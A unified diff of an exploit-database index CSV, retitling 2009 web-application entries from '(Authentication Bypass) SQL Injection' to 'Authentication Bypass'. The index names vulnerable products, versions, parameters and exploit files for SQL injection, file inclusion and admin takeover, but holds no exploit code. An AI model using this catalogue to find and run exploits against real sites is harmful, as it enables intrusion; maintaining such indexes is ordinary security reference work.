8674,platforms/php/webapps/8674.txt,"Mlffat 2.1 - (Authentication Bypass / Cookie) SQL Injection",2009-05-13,Qabandi,php,webapps,0
|
||||
8675,platforms/php/webapps/8675.txt,"Ascad Networks 5 - Products Insecure Cookie Handling",2009-05-14,G4N0K,php,webapps,0
|
||||
8676,platforms/php/webapps/8676.txt,"My Game Script 2.0 - (Authentication Bypass) SQL Injection",2009-05-14,"ThE g0bL!N",php,webapps,0
|
||||
8676,platforms/php/webapps/8676.txt,"My Game Script 2.0 - Authentication Bypass",2009-05-14,"ThE g0bL!N",php,webapps,0
|
||||
8679,platforms/php/webapps/8679.txt,"Shutter 0.1.1 - Multiple SQL Injections",2009-05-14,YEnH4ckEr,php,webapps,0
|
||||
8680,platforms/php/webapps/8680.txt,"beLive 0.2.3 - (arch.php arch) Local File Inclusion",2009-05-14,Kacper,php,webapps,0
|
||||
8681,platforms/php/webapps/8681.php,"StrawBerry 1.1.1 - Local File Inclusion / Remote Command Execution",2009-05-14,[AVT],php,webapps,0
|
||||
8682,platforms/php/webapps/8682.txt,"MRCGIGUY ClickBank Directory 1.0.1 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0
|
||||
8683,platforms/php/webapps/8683.txt,"Submitter Script - (Authentication Bypass) SQL Injection",2009-05-14,"ThE g0bL!N",php,webapps,0
|
||||
8683,platforms/php/webapps/8683.txt,"Submitter Script - Authentication Bypass",2009-05-14,"ThE g0bL!N",php,webapps,0
|
||||
8684,platforms/php/webapps/8684.txt,"MRCGIGUY Hot Links SQL 3.2.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0
|
||||
8685,platforms/php/webapps/8685.txt,"MRCGIGUY Amazon Directory 1.0/2.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0
|
||||
8686,platforms/php/webapps/8686.txt,"MRCGIGUY Message Box 1.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0
|
||||
|
|
@ -21019,7 +21022,7 @@ id,file,description,date,author,platform,type,port
|
|||
8707,platforms/php/webapps/8707.txt,"my-colex 1.4.2 - Authentication Bypass / Cross-Site Scripting / SQL Injection",2009-05-15,YEnH4ckEr,php,webapps,0
|
||||
8708,platforms/php/webapps/8708.txt,"my-gesuad 0.9.14 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-05-15,YEnH4ckEr,php,webapps,0
|
||||
8709,platforms/php/webapps/8709.txt,"Pc4Uploader 9.0 - Blind SQL Injection",2009-05-18,Qabandi,php,webapps,0
|
||||
8710,platforms/php/webapps/8710.txt,"PHP Dir Submit - (Authentication Bypass) SQL Injection",2009-05-18,snakespc,php,webapps,0
|
||||
8710,platforms/php/webapps/8710.txt,"PHP Dir Submit - Authentication Bypass",2009-05-18,snakespc,php,webapps,0
|
||||
8711,platforms/php/webapps/8711.txt,"Online Rental Property Script 5.0 - 'pid' Parameter SQL Injection",2009-05-18,"UnderTaker HaCkEr",php,webapps,0
|
||||
8713,platforms/php/webapps/8713.txt,"coppermine photo Gallery 1.4.22 - Multiple Vulnerabilities",2009-05-18,girex,php,webapps,0
|
||||
8714,platforms/php/webapps/8714.txt,"Flyspeck CMS 6.8 - Local/Remote File Inclusion / Change Add Admin",2009-05-18,ahmadbady,php,webapps,0
|
||||
|
|
@ -21041,7 +21044,7 @@ id,file,description,date,author,platform,type,port
|
|||
8738,platforms/php/webapps/8738.txt,"Dog Pedigree Online Database 1.0.1b - Multiple SQL Injections",2009-05-19,YEnH4ckEr,php,webapps,0
|
||||
8739,platforms/php/webapps/8739.txt,"Dog Pedigree Online Database 1.0.1b - Insecure Cookie Handling",2009-05-19,YEnH4ckEr,php,webapps,0
|
||||
8740,platforms/php/webapps/8740.pl,"Dog Pedigree Online Database 1.0.1b - Blind SQL Injection",2009-05-19,YEnH4ckEr,php,webapps,0
|
||||
8741,platforms/php/webapps/8741.txt,"DM FileManager 3.9.2 - (Authentication Bypass) SQL Injection",2009-05-19,snakespc,php,webapps,0
|
||||
8741,platforms/php/webapps/8741.txt,"DM FileManager 3.9.2 - Authentication Bypass",2009-05-19,snakespc,php,webapps,0
|
||||
8743,platforms/php/webapps/8743.txt,"Joomla! Component Casino 0.3.1 - Multiple SQL Injections Exploits",2009-05-20,ByALBAYX,php,webapps,0
|
||||
8744,platforms/php/webapps/8744.txt,"Exjune Officer Message System 1 - Multiple Vulnerabilities",2009-05-20,ByALBAYX,php,webapps,0
|
||||
8745,platforms/php/webapps/8745.txt,"Catviz 0.4.0 beta1 - Local File Inclusion / Cross-Site Scripting",2009-05-20,ByALBAYX,php,webapps,0
|
||||
|
|
@ -21052,10 +21055,10 @@ id,file,description,date,author,platform,type,port
|
|||
8750,platforms/php/webapps/8750.txt,"PHP Article Publisher - Arbitrary Authentication Bypass",2009-05-20,"ThE g0bL!N",php,webapps,0
|
||||
8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 - (forumid) Blind SQL Injection",2009-05-20,snakespc,php,webapps,0
|
||||
8752,platforms/php/webapps/8752.txt,"Jorp 1.3.05.09 - Arbitrary Remove Projects/Tasks",2009-05-20,YEnH4ckEr,php,webapps,0
|
||||
8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 - (Authentication Bypass) SQL Injection",2009-05-21,Striker7,php,webapps,0
|
||||
8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 - Authentication Bypass",2009-05-21,Striker7,php,webapps,0
|
||||
8756,platforms/asp/webapps/8756.txt,"asp inline Corporate Calendar - SQL Injection / Cross-Site Scripting",2009-05-21,Bl@ckbe@rD,asp,webapps,0
|
||||
8759,platforms/php/webapps/8759.txt,"Flash Quiz Beta 2 - Multiple SQL Injections",2009-05-21,YEnH4ckEr,php,webapps,0
|
||||
8761,platforms/php/webapps/8761.txt,"Article Directory - (Authentication Bypass) SQL Injection",2009-05-21,Hakxer,php,webapps,0
|
||||
8761,platforms/php/webapps/8761.txt,"Article Directory - Authentication Bypass",2009-05-21,Hakxer,php,webapps,0
|
||||
8762,platforms/php/webapps/8762.txt,"Article Directory - 'page.php' Blind SQL Injection",2009-05-21,"ThE g0bL!N",php,webapps,0
|
||||
8763,platforms/php/webapps/8763.txt,"ZaoCMS - Insecure Cookie Handling",2009-05-21,"ThE g0bL!N",php,webapps,0
|
||||
8764,platforms/php/webapps/8764.txt,"ZaoCMS - 'download.php' Remote File Disclosure",2009-05-21,"ThE g0bL!N",php,webapps,0
|
||||
|
|
@ -21085,7 +21088,7 @@ id,file,description,date,author,platform,type,port
|
|||
8803,platforms/php/webapps/8803.txt,"MyForum 1.3 - Authentication Bypass",2009-05-26,"ThE g0bL!N",php,webapps,0
|
||||
8805,platforms/php/webapps/8805.txt,"Flash Image Gallery 1.1 - Arbitrary Config File Disclosure",2009-05-26,DarkbiteX,php,webapps,0
|
||||
8807,platforms/php/webapps/8807.htm,"ShaadiClone 2.0 - (addAdminmembercode.php) Add Admin",2009-05-26,x.CJP.x,php,webapps,0
|
||||
8808,platforms/php/webapps/8808.txt,"phpBugTracker 1.0.3 - (Authentication Bypass) SQL Injection",2009-05-26,ByALBAYX,php,webapps,0
|
||||
8808,platforms/php/webapps/8808.txt,"phpBugTracker 1.0.3 - Authentication Bypass",2009-05-26,ByALBAYX,php,webapps,0
|
||||
8809,platforms/php/webapps/8809.htm,"ZeeCareers 2.0 - 'addAdminmembercode.php' Add Admin",2009-05-26,x.CJP.x,php,webapps,0
|
||||
8810,platforms/php/webapps/8810.txt,"WebMember 1.0 - (formID) SQL Injection",2009-05-26,KIM,php,webapps,0
|
||||
8811,platforms/php/webapps/8811.txt,"Joomla! Component Com_Agora 3.0.0 RC1 - Arbitrary File Upload",2009-05-26,ByALBAYX,php,webapps,0
|
||||
|
|
@ -21100,7 +21103,7 @@ id,file,description,date,author,platform,type,port
|
|||
8820,platforms/php/webapps/8820.txt,"amember 3.1.7 - Cross-Site Scripting / SQL Injection / HTML Injection",2009-05-29,intern0t,php,webapps,0
|
||||
8821,platforms/php/webapps/8821.txt,"Joomla! Component JVideo 0.3.x - SQL Injection",2009-05-29,"Chip d3 bi0s",php,webapps,0
|
||||
8823,platforms/php/webapps/8823.txt,"212Cafe WebBoard 2.90 Beta - Remote File Disclosure",2009-05-29,MrDoug,php,webapps,0
|
||||
8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - (Authentication Bypass) SQL Injection",2009-05-29,TiGeR-Dz,php,webapps,0
|
||||
8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - Authentication Bypass",2009-05-29,TiGeR-Dz,php,webapps,0
|
||||
8827,platforms/php/webapps/8827.txt,"ecshop 2.6.2 - Multiple Remote Command Execution Vulnerabilities",2009-05-29,Securitylab.ir,php,webapps,0
|
||||
8828,platforms/php/webapps/8828.txt,"Arab Portal 2.2 - Authentication Bypass",2009-05-29,"sniper code",php,webapps,0
|
||||
8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - 'maincatid' Parameter SQL Injection",2009-05-29,Br0ly,php,webapps,0
|
||||
|
|
@ -21129,7 +21132,7 @@ id,file,description,date,author,platform,type,port
|
|||
8859,platforms/asp/webapps/8859.txt,"WebEyes Guest Book 3 - 'yorum.asp mesajid' SQL Injection",2009-06-02,Bl@ckbe@rD,asp,webapps,0
|
||||
8860,platforms/php/webapps/8860.txt,"Podcast Generator 1.2 - 'GLOBALS[]' Multiple Vulnerabilities",2009-06-02,StAkeR,php,webapps,0
|
||||
8864,platforms/php/webapps/8864.txt,"My Mini Bill - (orderid) SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps,0
|
||||
8865,platforms/php/webapps/8865.txt,"EgyPlus 7ml 1.0.1 - (Authentication Bypass) SQL Injection",2009-06-03,Qabandi,php,webapps,0
|
||||
8865,platforms/php/webapps/8865.txt,"EgyPlus 7ml 1.0.1 - Authentication Bypass",2009-06-03,Qabandi,php,webapps,0
|
||||
8866,platforms/php/webapps/8866.php,"Podcast Generator 1.2 - Unauthorized Re-Installation Remote Exploit",2009-06-03,StAkeR,php,webapps,0
|
||||
8867,platforms/php/webapps/8867.pl,"Joomla! Component Seminar 1.28 - 'id' Blind SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps,0
|
||||
8868,platforms/php/webapps/8868.txt,"OCS Inventory NG 1.02 - Remote File Disclosure",2009-06-03,"Nico Leidecker",php,webapps,0
|
||||
|
|
@ -21143,10 +21146,10 @@ id,file,description,date,author,platform,type,port
|
|||
8878,platforms/php/webapps/8878.txt,"Web Directory PRO - Remote Database Backup",2009-06-04,TiGeR-Dz,php,webapps,0
|
||||
8879,platforms/php/webapps/8879.htm,"Host Directory PRO 2.1.0 - Remote Change Admin Password",2009-06-04,TiGeR-Dz,php,webapps,0
|
||||
8882,platforms/php/webapps/8882.txt,"Pixelactivo 3.0 - (idx) SQL Injection",2009-06-05,snakespc,php,webapps,0
|
||||
8883,platforms/php/webapps/8883.txt,"Pixelactivo 3.0 - (Authentication Bypass) SQL Injection",2009-06-05,"ThE g0bL!N",php,webapps,0
|
||||
8883,platforms/php/webapps/8883.txt,"Pixelactivo 3.0 - Authentication Bypass",2009-06-05,"ThE g0bL!N",php,webapps,0
|
||||
8884,platforms/php/webapps/8884.txt,"Kjtechforce mailman b1 - (code) SQL Injection Delete Row",2009-06-05,YEnH4ckEr,php,webapps,0
|
||||
8885,platforms/php/webapps/8885.pl,"Kjtechforce mailman b1 - (dest) Blind SQL Injection",2009-06-05,YEnH4ckEr,php,webapps,0
|
||||
8886,platforms/php/webapps/8886.txt,"MyCars Automotive - (Authentication Bypass) SQL Injection",2009-06-08,snakespc,php,webapps,0
|
||||
8886,platforms/php/webapps/8886.txt,"MyCars Automotive - Authentication Bypass",2009-06-08,snakespc,php,webapps,0
|
||||
8889,platforms/asp/webapps/8889.txt,"VT-Auth 1.0 - (zHk8dEes3.txt) File Disclosure",2009-06-08,ByALBAYX,asp,webapps,0
|
||||
8890,platforms/asp/webapps/8890.txt,"FipsCMS Light 2.1 - 'db.mdb' Remote Database Disclosure",2009-06-08,ByALBAYX,asp,webapps,0
|
||||
8891,platforms/php/webapps/8891.txt,"Joomla! Component com_school 1.4 - (classid) SQL Injection",2009-06-08,"Chip d3 bi0s",php,webapps,0
|
||||
|
|
@ -21183,7 +21186,7 @@ id,file,description,date,author,platform,type,port
|
|||
8931,platforms/php/webapps/8931.txt,"TorrentVolve 1.4 - (deleteTorrent) Delete Arbitrary File",2009-06-11,Br0ly,php,webapps,0
|
||||
8932,platforms/php/webapps/8932.txt,"yogurt 0.3 - Cross-Site Scripting / SQL Injection",2009-06-11,Br0ly,php,webapps,0
|
||||
8933,platforms/php/webapps/8933.php,"Sniggabo CMS - 'article.php id' SQL Injection",2009-06-11,Lidloses_Auge,php,webapps,0
|
||||
8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 - (Authentication Bypass) SQL Injection",2009-06-12,ByALBAYX,php,webapps,0
|
||||
8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 - Authentication Bypass",2009-06-12,ByALBAYX,php,webapps,0
|
||||
8936,platforms/php/webapps/8936.txt,"4Images 1.7.7 - Filter Bypass HTML Injection / Cross-Site Scripting",2009-06-12,Qabandi,php,webapps,0
|
||||
8937,platforms/php/webapps/8937.txt,"campus virtual-lms - Cross-Site Scripting / SQL Injection",2009-06-12,Yasión,php,webapps,0
|
||||
8939,platforms/php/webapps/8939.pl,"phpWebThings 1.5.2 - MD5 Hash Retrieve/File Disclosure",2009-06-12,StAkeR,php,webapps,0
|
||||
|
|
@ -21242,12 +21245,12 @@ id,file,description,date,author,platform,type,port
|
|||
9016,platforms/php/webapps/9016.txt,"Joomla! Component com_amocourse - 'catid' SQL Injection",2009-06-24,"Chip d3 bi0s",php,webapps,0
|
||||
9017,platforms/php/webapps/9017.txt,"Joomla! Component com_pinboard - (task) SQL Injection",2009-06-25,Stack,php,webapps,0
|
||||
9018,platforms/php/webapps/9018.txt,"MyFusion 6b - settings[locale] Local File Inclusion",2009-06-25,CraCkEr,php,webapps,0
|
||||
9019,platforms/php/webapps/9019.txt,"AlumniServer 1.0.1 - (Authentication Bypass) SQL Injection",2009-06-25,YEnH4ckEr,php,webapps,0
|
||||
9019,platforms/php/webapps/9019.txt,"AlumniServer 1.0.1 - Authentication Bypass",2009-06-25,YEnH4ckEr,php,webapps,0
|
||||
9020,platforms/php/webapps/9020.py,"AlumniServer 1.0.1 - (resetpwemail) Blind SQL Injection",2009-06-25,YEnH4ckEr,php,webapps,0
|
||||
9021,platforms/php/webapps/9021.txt,"MD-Pro 1.083.x - Survey Module (pollID) Blind SQL Injection",2009-06-25,XaDoS,php,webapps,0
|
||||
9022,platforms/php/webapps/9022.txt,"Virtue Online Test Generator - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-06-26,HxH,php,webapps,0
|
||||
9023,platforms/php/webapps/9023.txt,"PHP-Address Book 4.0.x - Multiple SQL Injections",2009-06-26,YEnH4ckEr,php,webapps,0
|
||||
9024,platforms/php/webapps/9024.txt,"ForumPal FE 1.1 - (Authentication Bypass) SQL Injection",2009-06-26,"ThE g0bL!N",php,webapps,0
|
||||
9024,platforms/php/webapps/9024.txt,"ForumPal FE 1.1 - Authentication Bypass",2009-06-26,"ThE g0bL!N",php,webapps,0
|
||||
9025,platforms/php/webapps/9025.txt,"Mega File Manager 1.0 - 'index.php' Local File Inclusion",2009-06-26,SirGod,php,webapps,0
|
||||
9026,platforms/php/webapps/9026.txt,"WHOISCART - (Authentication Bypass) Information Disclosure",2009-06-29,SecurityRules,php,webapps,0
|
||||
9027,platforms/php/webapps/9027.txt,"Messages Library 2.0 - (cat.php CatID) SQL Injection",2009-06-29,SecurityRules,php,webapps,0
|
||||
|
|
@ -21283,7 +21286,7 @@ id,file,description,date,author,platform,type,port
|
|||
9075,platforms/php/webapps/9075.txt,"AdminLog 0.5 - (valid_login) Authentication Bypass",2009-07-02,SirGod,php,webapps,0
|
||||
9076,platforms/php/webapps/9076.php,"Almnzm 2.0 - Blind SQL Injection",2009-07-02,Qabandi,php,webapps,0
|
||||
9077,platforms/php/webapps/9077.txt,"ConPresso 3.4.8 - 'detail.php' Blind SQL Injection",2009-07-02,tmh,php,webapps,0
|
||||
9079,platforms/php/webapps/9079.txt,"Opial 1.0 - (Authentication Bypass) SQL Injection",2009-07-02,Moudi,php,webapps,0
|
||||
9079,platforms/php/webapps/9079.txt,"Opial 1.0 - Authentication Bypass",2009-07-02,Moudi,php,webapps,0
|
||||
9080,platforms/php/webapps/9080.txt,"Opial 1.0 - 'albumID' SQL Injection",2009-07-02,"ThE g0bL!N",php,webapps,0
|
||||
9081,platforms/php/webapps/9081.txt,"Rentventory - Multiple SQL Injections",2009-07-02,Moudi,php,webapps,0
|
||||
9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b - Arbitrary File Upload",2009-07-09,"ThE g0bL!N",php,webapps,0
|
||||
|
|
@ -21329,7 +21332,7 @@ id,file,description,date,author,platform,type,port
|
|||
9161,platforms/php/webapps/9161.txt,"Admin News Tools - Remote Contents Change",2009-07-15,Securitylab.ir,php,webapps,0
|
||||
9162,platforms/php/webapps/9162.txt,"WebLeague 2.2.0 - 'profile.php' SQL Injection",2009-07-15,Arka69,php,webapps,0
|
||||
9164,platforms/php/webapps/9164.txt,"webLeague 2.2.0 - (install.php) Remote Change Password Exploit",2009-07-16,TiGeR-Dz,php,webapps,0
|
||||
9165,platforms/php/webapps/9165.pl,"webLeague 2.2.0 - (Authentication Bypass) SQL Injection",2009-07-16,ka0x,php,webapps,0
|
||||
9165,platforms/php/webapps/9165.pl,"webLeague 2.2.0 - Authentication Bypass",2009-07-16,ka0x,php,webapps,0
|
||||
9166,platforms/php/webapps/9166.txt,"ZenPhoto Gallery 1.2.5 - Admin Password Reset (CRSF)",2009-07-16,petros,php,webapps,0
|
||||
9171,platforms/php/webapps/9171.txt,"VS PANEL 7.5.5 - (results.php Cat_ID) SQL Injection",2009-07-16,C0D3R-Dz,php,webapps,0
|
||||
9174,platforms/php/webapps/9174.txt,"PHP Live! 3.2.1/2 - 'x' Parameter Blind SQL Injection",2009-07-16,boom3rang,php,webapps,0
|
||||
|
|
@ -21352,7 +21355,7 @@ id,file,description,date,author,platform,type,port
|
|||
9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS - SQL Injection / Blind SQL Injection",2009-07-20,"599eme Man",php,webapps,0
|
||||
9217,platforms/php/webapps/9217.txt,"E-Xoopport 3.1 Module MyAnnonces - (lid) SQL Injection",2009-07-20,Vrs-hCk,php,webapps,0
|
||||
9219,platforms/php/webapps/9219.txt,"powerUpload 2.4 - (Authentication Bypass) Insecure Cookie Handling",2009-07-20,InjEctOr5,php,webapps,0
|
||||
9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 - (Authentication Bypass) SQL Injection",2009-07-21,n3w7u,php,webapps,0
|
||||
9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 - Authentication Bypass",2009-07-21,n3w7u,php,webapps,0
|
||||
9226,platforms/php/webapps/9226.txt,"phpDirectorySource 1.0 - Cross-Site Scripting / SQL Injection",2009-07-21,Moudi,php,webapps,0
|
||||
9227,platforms/php/webapps/9227.txt,"Meta Search Engine Script - (url) Local File Disclosure",2009-07-21,Moudi,php,webapps,0
|
||||
9231,platforms/php/webapps/9231.txt,"Phorum 5.2.11 - Permanent Cross-Site Scripting",2009-07-22,Crashfr,php,webapps,0
|
||||
|
|
@ -21364,7 +21367,7 @@ id,file,description,date,author,platform,type,port
|
|||
9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum - SQL Injection / Cross-Site Scripting",2009-07-24,Moudi,php,webapps,0
|
||||
9244,platforms/php/webapps/9244.txt,"Joomla! Extension UIajaxIM 1.1 - JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0
|
||||
9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - (index.php idAuthor) SQL Injection",2009-07-24,NoGe,php,webapps,0
|
||||
9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - (Authentication Bypass) SQL Injection",2009-07-24,SwEET-DeViL,php,webapps,0
|
||||
9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - Authentication Bypass",2009-07-24,SwEET-DeViL,php,webapps,0
|
||||
9249,platforms/php/webapps/9249.txt,"XOOPS Celepar Module Qas - (codigo) SQL Injection",2009-07-24,s4r4d0,php,webapps,0
|
||||
9250,platforms/php/webapps/9250.sh,"WordPress 2.8.1 - (url) Cross-Site Scripting",2009-07-24,superfreakaz0rz,php,webapps,0
|
||||
9251,platforms/php/webapps/9251.txt,"Deonixscripts Templates Management 1.3 - SQL Injection",2009-07-24,d3b4g,php,webapps,0
|
||||
|
|
@ -21390,9 +21393,9 @@ id,file,description,date,author,platform,type,port
|
|||
9276,platforms/php/webapps/9276.txt,"Joomla! Component IXXO Cart! Standalone and - SQL Injection",2009-07-27,sm0k3,php,webapps,0
|
||||
9279,platforms/php/webapps/9279.pl,"PunBB Automatic Image Upload 1.3.5 - SQL Injection",2009-07-27,Dante90,php,webapps,0
|
||||
9280,platforms/php/webapps/9280.pl,"PunBB Automatic Image Upload 1.3.5 - Arbitrary File Delete",2009-07-27,Dante90,php,webapps,0
|
||||
9281,platforms/php/webapps/9281.txt,"Limny 1.01 - (Authentication Bypass) SQL Injection",2009-07-27,SirGod,php,webapps,0
|
||||
9281,platforms/php/webapps/9281.txt,"Limny 1.01 - Authentication Bypass",2009-07-27,SirGod,php,webapps,0
|
||||
9282,platforms/php/webapps/9282.txt,"Magician Blog 1.0 - (ids) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0
|
||||
9283,platforms/php/webapps/9283.txt,"Magician Blog 1.0 - (Authentication Bypass) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0
|
||||
9283,platforms/php/webapps/9283.txt,"Magician Blog 1.0 - Authentication Bypass",2009-07-27,Evil-Cod3r,php,webapps,0
|
||||
9284,platforms/php/webapps/9284.txt,"SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusion",2009-07-27,GoLd_M,php,webapps,0
|
||||
9287,platforms/php/webapps/9287.txt,"PHP Paid 4 Mail Script - 'paidbanner.php ID' SQL Injection",2009-07-28,"ThE g0bL!N",php,webapps,0
|
||||
9288,platforms/php/webapps/9288.txt,"phpArcadeScript 4.0 - 'id' Parameter SQL Injection",2009-07-28,MizoZ,php,webapps,0
|
||||
|
|
@ -21419,26 +21422,26 @@ id,file,description,date,author,platform,type,port
|
|||
9325,platforms/php/webapps/9325.txt,"PortalXP Teacher Edition 1.2 - Multiple SQL Injections",2009-08-01,SirGod,php,webapps,0
|
||||
9326,platforms/php/webapps/9326.txt,"aa33code 0.0.1 - (Local File Inclusion / Authentication Bypass/File Disclosure) Multiple Remote Vulnerabilities",2009-08-01,SirGod,php,webapps,0
|
||||
9327,platforms/php/webapps/9327.txt,"mobilelib gold 3.0 - Authentication Bypass / SQL Injection",2009-08-01,SwEET-DeViL,php,webapps,0
|
||||
9328,platforms/asp/webapps/9328.txt,"AW BannerAd - (Authentication Bypass) SQL Injection",2009-08-03,Ro0T-MaFia,asp,webapps,0
|
||||
9328,platforms/asp/webapps/9328.txt,"AW BannerAd - Authentication Bypass",2009-08-03,Ro0T-MaFia,asp,webapps,0
|
||||
9331,platforms/php/webapps/9331.txt,"ProjectButler 1.5.0 - (pda_projects.php offset) Remote File Inclusion",2009-08-03,cr4wl3r,php,webapps,0
|
||||
9332,platforms/php/webapps/9332.txt,"Ajax Short URL Script - (Authentication Bypass) SQL Injection",2009-08-03,Cicklow,php,webapps,0
|
||||
9332,platforms/php/webapps/9332.txt,"Ajax Short URL Script - Authentication Bypass",2009-08-03,Cicklow,php,webapps,0
|
||||
9333,platforms/php/webapps/9333.txt,"Netpet CMS 1.9 - (confirm.php language) Local File Inclusion",2009-08-03,SirGod,php,webapps,0
|
||||
9334,platforms/php/webapps/9334.txt,"QuickDev 4 - 'download.php' File Disclosure",2009-08-03,SirGod,php,webapps,0
|
||||
9335,platforms/php/webapps/9335.txt,"TT Web Site Manager 0.5 - (Authentication Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0
|
||||
9336,platforms/php/webapps/9336.txt,"SimpleLoginSys 0.5 - (Authentication Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0
|
||||
9335,platforms/php/webapps/9335.txt,"TT Web Site Manager 0.5 - Authentication Bypass",2009-08-03,SirGod,php,webapps,0
|
||||
9336,platforms/php/webapps/9336.txt,"SimpleLoginSys 0.5 - Authentication Bypass",2009-08-03,SirGod,php,webapps,0
|
||||
9337,platforms/php/webapps/9337.txt,"simplePHPWeb 0.2 - (files.php) Authentication Bypass",2009-08-03,SirGod,php,webapps,0
|
||||
9338,platforms/php/webapps/9338.txt,"Miniweb 2.0 Module Publisher - Blind SQL Injection / Cross-Site Scripting",2009-08-03,Moudi,php,webapps,0
|
||||
9339,platforms/php/webapps/9339.txt,"Miniweb 2.0 Module Survey Pro - Blind SQL Injection / Cross-Site Scripting",2009-08-03,Moudi,php,webapps,0
|
||||
9340,platforms/php/webapps/9340.txt,"x10 media adult script 1.7 - Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0
|
||||
9341,platforms/php/webapps/9341.txt,"Questions Answered 1.3 - (Authentication Bypass) SQL Injection",2009-08-03,snakespc,php,webapps,0
|
||||
9341,platforms/php/webapps/9341.txt,"Questions Answered 1.3 - Authentication Bypass",2009-08-03,snakespc,php,webapps,0
|
||||
9342,platforms/php/webapps/9342.txt,"elvin bts 1.2.2 - SQL Injection / Cross-Site Scripting",2009-08-03,"599eme Man",php,webapps,0
|
||||
9344,platforms/php/webapps/9344.txt,"Multi Website 1.5 - (index PHP action) SQL Injection",2009-08-03,SarBoT511,php,webapps,0
|
||||
9347,platforms/php/webapps/9347.txt,"Arab Portal 2.2 - 'mod.php' Local File Inclusion",2009-08-03,Qabandi,php,webapps,0
|
||||
9348,platforms/php/webapps/9348.txt,"Blink Blog System - (Authentication Bypass) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0
|
||||
9348,platforms/php/webapps/9348.txt,"Blink Blog System - Authentication Bypass",2009-08-03,"Salvatore Fresta",php,webapps,0
|
||||
9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 - (index.php more) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0
|
||||
9350,platforms/php/webapps/9350.txt,"MAXcms 3.11.20b - Remote File Inclusion / File Disclosure",2009-08-03,GoLd_M,php,webapps,0
|
||||
9351,platforms/php/webapps/9351.txt,"Payment Processor Script (PPScript) - 'shop.htm cid' SQL Injection",2009-08-03,ZoRLu,php,webapps,0
|
||||
9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - (Authentication Bypass) SQL Injection",2009-08-04,SirGod,php,webapps,0
|
||||
9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - Authentication Bypass",2009-08-04,SirGod,php,webapps,0
|
||||
9355,platforms/php/webapps/9355.txt,"elgg 1.5 - (/_css/js.php) Local File Inclusion",2009-08-04,eLwaux,php,webapps,0
|
||||
9356,platforms/php/webapps/9356.txt,"ShopMaker CMS 2.0 - Blind SQL Injection / Local File Inclusion",2009-08-04,PLATEN,php,webapps,0
|
||||
9357,platforms/cgi/webapps/9357.txt,"Perl$hop E-Commerce Script - Trust Boundary Input Parameter Injection",2009-08-04,Shadow,cgi,webapps,0
|
||||
|
|
@ -21453,18 +21456,18 @@ id,file,description,date,author,platform,type,port
|
|||
9380,platforms/php/webapps/9380.txt,"TYPO3 CMS 4.0 - (showUid) SQL Injection",2009-08-06,Ro0T-MaFia,php,webapps,0
|
||||
9383,platforms/php/webapps/9383.txt,"LM Starmail 2.0 - SQL Injection / File Inclusion",2009-08-06,int_main();,php,webapps,0
|
||||
9384,platforms/php/webapps/9384.txt,"Alwasel 1.5 - Multiple SQL Injections",2009-08-07,SwEET-DeViL,php,webapps,0
|
||||
9385,platforms/php/webapps/9385.txt,"PHotoLa Gallery 1.0 - (Authentication Bypass) SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0
|
||||
9385,platforms/php/webapps/9385.txt,"PHotoLa Gallery 1.0 - Authentication Bypass",2009-08-07,Red-D3v1L,php,webapps,0
|
||||
9387,platforms/php/webapps/9387.txt,"Banner Exchange Script 1.0 - (targetid) Blind SQL Injection",2009-08-07,"599eme Man",php,webapps,0
|
||||
9389,platforms/php/webapps/9389.txt,"Logoshows BBS 2.0 - (forumid) SQL Injection",2009-08-07,Ruzgarin_Oglu,php,webapps,0
|
||||
9390,platforms/php/webapps/9390.txt,"Typing Pal 1.0 - (idTableProduit) SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0
|
||||
9394,platforms/php/webapps/9394.pl,"Arab Portal 2.2 - (Authentication Bypass) Blind SQL Injection",2009-08-07,"Jafer Al Zidjali",php,webapps,0
|
||||
9395,platforms/php/webapps/9395.txt,"PHPCityPortal - (Authentication Bypass) SQL Injection",2009-08-07,CoBRa_21,php,webapps,0
|
||||
9395,platforms/php/webapps/9395.txt,"PHPCityPortal - Authentication Bypass",2009-08-07,CoBRa_21,php,webapps,0
|
||||
9396,platforms/php/webapps/9396.txt,"Facil Helpdesk - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiples Remote Vulnerabilities",2009-08-07,Moudi,php,webapps,0
|
||||
